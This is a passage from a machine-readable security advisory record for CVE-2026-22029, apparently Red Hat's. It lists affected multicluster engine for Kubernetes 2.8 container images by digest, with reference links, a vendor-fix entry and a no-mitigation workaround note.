"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "RHBZ#2428412",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428412"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22029",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22029"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx",
"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx"
}
],
"release_date": "2026-01-10T02:42:32.736000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
